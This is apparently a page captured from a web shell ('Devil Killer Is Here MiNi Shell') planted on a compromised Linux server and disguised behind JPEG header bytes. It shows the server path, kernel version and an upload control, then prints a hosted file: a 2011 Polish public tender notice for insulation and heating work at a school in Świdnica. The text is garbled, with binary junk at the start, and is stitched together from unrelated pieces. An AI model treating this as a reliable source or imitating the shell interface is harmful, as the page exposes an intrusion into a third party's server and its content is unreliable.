JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110516/115174-N-2011.html

<p class="kh_header"><b>Świdnica: wykonanie robót budowlanych w ramach zadania:

Termomodernizacja obiektów użyteczności publicznej pełniących funkcje edukacyjne
 i kulturalne na obszarze Przedgórza Sudeckiego i Niziny Śląskiej-
Prace termomodernizacyjne (docieplenie ścian i stropodachów, wymiana instalacji c.o., wymiana stolarki stalowej na ciepłą aluminiową) w Gimnazjum nr 1 w Świdnicy</b><br>
<b>Numer ogłoszenia: 115174 - 2011; data zamieszczenia: 16.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie robót budowlanych w ramach zadania:

Termomodernizacja obiektów użyteczności publicznej pełniących funkcje edukacyjne
 i kulturalne na obszarze Przedgórza Sudeckiego i Niziny Śląskiej-
Prace termomodernizacyjne (docieplenie ścian i stropodachów, wymiana instalacji c.o., wymiana stolarki stalowej na ciepłą aluminiową) w Gimnazjum nr 1 w Świdnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA
3.1. Lokalizacja 
Obszar zainwestowania obejmuje termomodernizację budynku głównego wraz z łącznikiem i salą gimnastyczną. Gimnazjum nr 1 przy ul. Kozara-Słobódzkiego 21, (nr dz 39/1 obr. 1 am 9; dz. nr 39/1 obr. 1 am 9) w Świdnicy. Budynek wykonany został w systemie uprzemysłowionym-szkielet żelbetowy z wypełnieniem ścian z bloczków gazobetonowych oraz z cegły ceramicznej pełnej. Stropy żelbetowe, gęstożebrowe typu DMS. Stropodach wentylowany pokryty papą asfaltową.

3.2. Przedmiot zamówienia
Przedmiotem przetargu jest wykonanie termomodernizacji ścian zewnętrznych styropianem w systemie BSO o gr.14 cm w strefie kontaktu z gruntem styropian ekstrudowany, docieplenie wszystkich stropodachów 18 cm warstwą styropapy z wykonaniem nowego pokrycia dachowego z 2 warstw papy termozgrzewalnej, a także  wymiana stalowej stolarki na stolarkę aluminiowa (aluminium ciepłe) o współczynniku przenikania  ciepła U=1,6 W/m2,K oraz wymianie instalacji centralnego ogrzewania wraz z wymiana grzejników na konwekcyjne, montaż zaworów termostatycznych oraz modernizacją węzła cieplnego. Obróbki blacharskie, parapety zew., rynny i rury spustowe należy wykonać z blachy tytanowo-cynkowej gr.0,7 mm. Elementy ślusarki użytkowej należy zdemontować na czas wykonania docieplenia wyremontować, pomalować oraz założyć ponownie. Wszelkie przekucia, demontaże, bruzdy dla wymienianego osprzętu c.o. oraz robót termomodernizacyjnych należy naprawić oraz pomalować, dobierając kolorystykę i materiał do istniejącego. Ponadto należy wymienić instalację odgromową na przewody DFe/Zn fi 6 mm. Wykonawca jest zobowiązany wykonać świadectwo energetyczne dla całego obiektu w formie papierowej w 4 egz. oraz w formie elektronicznej na CD w plikach pdf. i źródłowych. Podstawą wykonania świadectwa energetycznego jest ustawa - Prawo Budowlane (Dz.U.2010.243.1623 j.t. art. 5  ust.3-15, art.5(1), art.5(2), art.63 ust.2 i ust.3.)


CHARAKTERYSTYKA ZAMÓWIENIA:
Roboty przygotowawcze - rozbiórkowe, demontaż i montaż instalacji c.o.; odgromowej, docieplenie ścian i  stropodachów, obróbki blacharskie; wymiana naświetli. Przedmiot zamówienia opisany został szczegółowo w projekcie budowlanym autorstwa Pracowni Projektowej Archikon Robert Kryśpiak,  58-100 Świdnica, ul. Of. Oświęcimskich 21, w przedmiarze robót budowlanych oraz w specyfikacji technicznej wykonania i odbioru robót, które stanowią załączniki do SIWZ.
Zakres robót 
W zakresie zadania ujęto wykonanie robót budowlanych obejmujących miedzy innymi kategorie:
 wg Wspólnego Słownika Zamówień (kody CPV):  Roboty budowlane,
 Roboty rozbiórkowe, Roboty ziemne,
 Warstwy odsączające i podsypki pod nawierzchnie utwardzone,Roboty betonowe,
 Krawężniki i obrzeża,
 Nawierzchnie utwardzone,
 Elementy odwodnienia-uzbrojenie podziemne,
 Izolacja pionowa ścian fundamentowych,
 Roboty murowe,
 Roboty tynkowe,
Docieplenie ścian zewnętrznych,
Docieplenie stropodachów,
Obróbki blacharskie,
Roboty malarskie,
Stolarka okienna i drzwiowa,
 Roboty ślusarsko-kowalskie,
 Rusztowania. Instalowanie centralnego ogrzewania
 Instalowanie kotłów
Inne roboty i prace niezbędne do należytego wykonania zamówienia w tym:
     - opracowanie planu bezpieczeństwa i ochrony zdrowia BIOZ,
     - oznakowanie placu budowy,    
     - organizacja zaplecza budowy ( miejsce, pobór energii, wody, dozorowanie itd.),
     - wytyczenie geodezyjne wszystkich elementów budowy wymagających takiego wytyczenia,
     - sporządzenie, zatwierdzenie i wprowadzenie zastępczej organizacji ruchu na czas budowy,
     - sporządzenie dokumentacji powykonawczej z naniesionymi zmianami  w trakcie realizacji robót,
     - sporządzenie świadectwa energetycznego po zakończonej realizacji, 
     - wywóz materiałów nieużytecznych w miejscu z terenu budowy na składowisko odpadów (grzejniki z  
       demontaży należy przekazać kierownikowi adm. Gimnazjum nr 1 protokólarnie),
     - wywóz i składowanie materiałów użytecznych w miejscu wskazanym przez Zamawiającego na terenie miasta
       Świdnicy,
     - uporządkowanie i doprowadzenie do stanu pierwotnego terenu budowy po zakończeniu wszystkich robót
       objętych zamówieniem.
Projekty i specyfikacje techniczne wykonania i odbioru robót stanowią załącznik do niniejszej specyfikacji i wraz
z przedmiarami robót znajdują się na stronie internetowej Zamawiającego www.swidnica.bip-gov.info.pl                          w katalogu zamówienia publiczne. Dokumentacja projektowa znajduje się do wglądu w siedzibie Zamawiającego - Urząd Miejski w Świdnicy, przy ulicy Armii Krajowej nr 49, Referat Inwestycji - pok. 217. Przedmiary robót stanowią wyłącznie materiał pomocniczy dla wskazania technologii.
3.4 Warunki wykonywania robót.
1.   Przekazanie placu budowy nastąpi w terminie do 10 dni kalendarzowych od daty podpisania umowy.
2.   Zamawiający zapewnia nadzór inwestorski zgodnie z warunkami pozwolenia na budowę.
3.   Zamawiający zapewni nadzór autorski.
4.   Przedmiot zamówienia należy realizować zgodnie ze specyfikacją techniczną wykonania i odbioru robót,
            zgodnie z przepisami techniczno-budowlanymi z zachowaniem warunków technicznych wykonania i odbioru robót budowlano-montażowych, zgodnie z projektem, zasadami sztuki budowlanej oraz zgodnie         z przepisami BHP i p.poż. 
  5.   Roboty budowlane powinny być wykonywane zgodnie z reżimem technologicznym, określonym przez
              Polskie   Normy, producentów poszczególnych elementów, produktów, materiałów i urządzeń. 
    Wszystkie użyte do budowy materiały muszą odpowiadać parametrom podanym w projekcie, powinny
    posiadać odpowiedni atest i świadectwo dopuszczenia, wydane przez odpowiednie uprawnione instytucje,   
    zezwalające na stosowanie ich w budownictwie. Dokumenty te przed wbudowaniem należy przedłożyć  
    inspektorowi nadzoru inwestorskiego i Zamawiającemu.
6.  Wykonawca zobowiązany jest do przestrzegania warunków instytucji opiniujących projekt.
    7.   Obsługa geodezyjna, inwentaryzacja powykonawcza; organizacja, oznakowanie i zagospodarowanie 
                zaplecza budowy, oraz inne nakłady nie stanowiące wartości robót budowlanych, a niezbędne 
                do wykonania przedmiotu umowy należy objąć ceną ofertową. 
8.   Inwentaryzację geodezyjną powykonawczą, jeżeli jest wymagana, należy wykonać w formie drukowanej na pełnych arkuszach sekcji w trzech egzemplarzach z potwierdzeniem przyjęcia do państwowego zasobu geodezyjnego i kartograficznego oraz formie numerycznej w formacie TIFF - 400 dpi w pełnych sekcjach bez dodatkowych treści (pieczątek, metryk, zamalowań itp.). 
9.   Zamawiający zachowuje prawo dostępu do terenu budowy dla wskazanych przez siebie innych
            wykonawców,  a Wykonawca tego prawa nie może ograniczyć (np.: Zakład Gazowniczy,  Świdnickie
            Przedsiębiorstwo Wodociągów i Kanalizacja). 
10. Wykonawca jest odpowiedzialny za szkody powstałe w trakcie realizacji robót również wobec osób
             trzecich oraz w wyniku nieterminowego ich naprawienia.
11.  Wykonawca zobowiązany jest do przekazania na właściwe wysypisko odpadów materiałów z rozbiórki 
             nie  nadających się do ponownego wbudowania.
12.  Wykonawca umieści na budowie w widocznym miejscu tablicę informacyjną, ogłoszenie zawierające
             dane dotyczące bezpieczeństwa pracy i ochrony zdrowia oraz udostępni miejsce na umieszczenie tablicy
             informacyjnej wymaganej ze względu na współfinansowanie inwestycji przez UE w ramach Funduszu Spójności. 
13.  Wykonawca zapewni sprawowanie kierownictwa budowy i robót przez osoby posiadające odpowiednie
             kwalifikacje zawodowe i uprawnienia do kierowania robotami budowlanymi w odpowiednich 
             specjalnościach, zgodnie z wymogami Prawa Budowlanego.
14.  Wykonawca zobowiązany będzie do utrzymania i konserwacji nawierzchni na terenie budowy w okresie       
              przejściowym.
15.   Wszelkie rozbieżności stwierdzone w trakcie prowadzenia robót pomiędzy założeniami przyjętymi 
              w projekcie, a stanem faktycznym, mającymi wpływ na prawidłowe wykonanie prac, będą uzgadniane
              z projektantem w ramach nadzoru autorskiego.
16.    Wykonawca zrealizuje własnym staraniem tymczasowe obiekty i urządzenia na terenie placu budowy: 
               punkt poboru wody, punkt poboru energii elektrycznej, zabezpieczenie terenu budowy. 
  17.    Wykonawca będzie ponosił koszty organizacji terenu budowy, uzyska zgodę na zajęcie pasa drogowego
                 na czas prowadzenia robót, koszty oznakowania i zagospodarowania zaplecza budowy, zużycia wody
                 i energii w okresie realizacji robót, koszty utrzymania i konserwacji tymczasowych obiektów i urządzeń
                związanych z terenem budowy oraz inne nakłady nie stanowiące wartości robót budowlanych, 
                 a niezbędne  do wykonania przedmiotu umowy. W/w koszty Wykonawca ujmie w cenie ofertowej.
  18.    W związku z dofinansowaniem inwestycji pn: Termomodernizacja obiektów użyteczności publicznej pełniących funkcje edukacyjne i kulturalne na obszarze Przedgórza Sudeckiego i Niziny Śląskiej-Termomodernizacja Gimnazjum nr 1 w Świdnicy ze środków UE w ramach Funduszu Spójności, Wykonawca  zobowiązany jest do podjęcia wszelkich działań  w celu zapewnienia wykonania przedmiotu zamówienia w terminie umownym.
 19.    Po wyborze oferty, przed podpisaniem umowy, Wykonawca przedłoży Zamawiającemu uzgodnione z
                 Zamawiającym harmonogramy rzeczowo-finansowe realizacji zamówienia.
   20.    Za koordynację robót branżowych i prowadzenie dokumentacji budowy odpowiadać będzie kierownik
                 budowy.  
 21.   Wszelkie prace wykonywane będą na obiekcie czynnym. Remont należy przeprowadzać w sposób zapewniający ciągłość pracy i bezpieczeństwo osób i mienia znajdujących się w strefie zagrożenia. Wszelkie koszty związane ze stratami przez niewłaściwe zabezpieczenie obiektu będą obciążać Wykonawcę.

 
3.5  Warunki odbioru robót.
1  Wykonawca zgłasza do odbioru wszystkie roboty zanikowe.
2.  Odbiory częściowe robót będą zakończone protokołami odbioru elementów wykonanych robót
          potwierdzonymi przez inspektora nadzoru.
3.  W dniu zgłoszenia gotowości do odbioru końcowego zadania Wykonawca dostarcza inspektorowi nadzoru   
          inwestorskiego wszystkie wymagane dokumenty odbiorowe w tym: dziennik budowy, protokoły 
          technicznego odbioru robót związanych z wykonywaniem przedmiotu zamówienia, dokumentację 
          powykonawczą, atesty i aprobaty na wbudowane materiały, inwentaryzację geodezyjną powykonawczą             ( jeżeli jest wymagana).
4.  Zamawiający przystąpi do czynności odbiorowych przedmiotu zamówienia w terminie do 10 dni roboczych   
         od  daty zgłoszenia gotowości do odbioru robót. Podstawą rozpoczęcia czynności odbioru końcowego 
         będzie  zawiadomienie pisemne Wykonawcy, wpis kierownika budowy do dziennika budowy o zakończeniu 
         wszystkich robót będących przedmiotem zamówienia potwierdzony ze strony Zamawiającego przez 
              inspektora nadzoru oraz potwierdzenie inspektora nadzoru kompletności przekazanych mu przez 
              Wykonawcę dokumentów odbiorowych. 
5.  Podstawą do podpisania przez Zamawiającego protokołu końcowego odbioru robót będzie bezusterkowe
          wykonanie przedmiotu zamówienia. Zakończenie robót i zgłoszenie przez Wykonawcę gotowości do
          odbioru końcowego nastąpić winno w terminie gwarantującym możliwość zakończenia czynności 
          odbiorowych i  podpisania protokołu końcowego odbioru robót w nieprzekraczalnym terminie do 
          31.10.2011r.
6.  Po zakończeniu robót Wykonawca zobowiązany jest do uporządkowania terenu budowy i przekazania 
         go  Zamawiającemu.


3.6 Informacje dodatkowe


Zamawiający przewiduje udzielenie zamówień uzupełniających na podstawie art.67 ust.1 pkt 6 ustawy PZP.
W sytuacji rażącego zaniedbania Wykonawcy mogącego skutkować np. utratą dofinansowania ze środków UE w ramach Funduszu Spójności Zamawiający ma prawo odstąpić od umowy oraz żądać od Wykonawcy stosownego odszkodowania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających, o którym mowa w art. 67 ust. 1 pkt  6) ustawy z dnia 29.01.2004 r. Prawo Zamówień Publicznych (Dz.U.10.113.759 ze zm..)</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.11.12.00-0, 45.23.32.22-1, 45.26.23.00-4, 45.23.32.20-7, 45.23.24.00-6, 45.32.00.00-6, 45.26.25.20-2, 45.41.00.00-4, 45.45.00.00-6, 45.44.00.00-3, 45.42.10.00-4, 45.45.00.00-6, 45.26.21.00-2, 45.33.11.10-0, 45.33.11.10-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Oferta powinna być zabezpieczona wadium w wysokości: 20.000,00 zł (słownie: dwadzieścia tysięcy złotych 00/100).Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. przed 31.05.2011 r. przed godz. 09.00.
2.Wadium może być wniesione w formach określonych w art.45 ust.6 ustawy Prawo Zamówień Publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się zrealizowaniem trzech robót budowlanych na łączną kwotę minimum 2.000.000 zł netto w okresie ostatnich pięciu lat, a jeśli okres prowadzonej działalności jest krótszy w tym okresie, polegających na wykonaniu prac termomodrnizacyjnych w budynkach mieszkalnych lub użyteczności publicznej. W wartości za wykonanie trzech  robót budowlanych jak wyżej tj. 2.000.000 zł ma się zawierać: kwota za wykonanie lub remont stolarki okiennej lub drzwiowej, docieplenia ścian lub stropodachów na kwotę minimum 1.800.000 zł netto, oraz kwota za wykonanie lub remont centralnego ogrzewania minimum 200.000 zł netto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje odpowiednim potencjałem technicznym
    oraz osobami zdolnymi do wykonania niniejszego zamówienia posiadającymi uprawnienia budowlane
    do kierowania robotami budowlanymi bez ograniczeń w specjalnościach:
konstrukcyjno-budowlanej i uprawnienia do kierowania robotami budowlanymi,
	instalacyjnej  w zakresie sieci i urządzeń wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych,
wymaganych prawem budowlanym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości
 min. 2 000 000,00 zł (dwa miliony złotych) oraz że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej dotyczące przedmiotu zamówienia na sumę ubezpieczenia nie mniejszą jak: 1 000.000,00 zł. (jeden milion złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
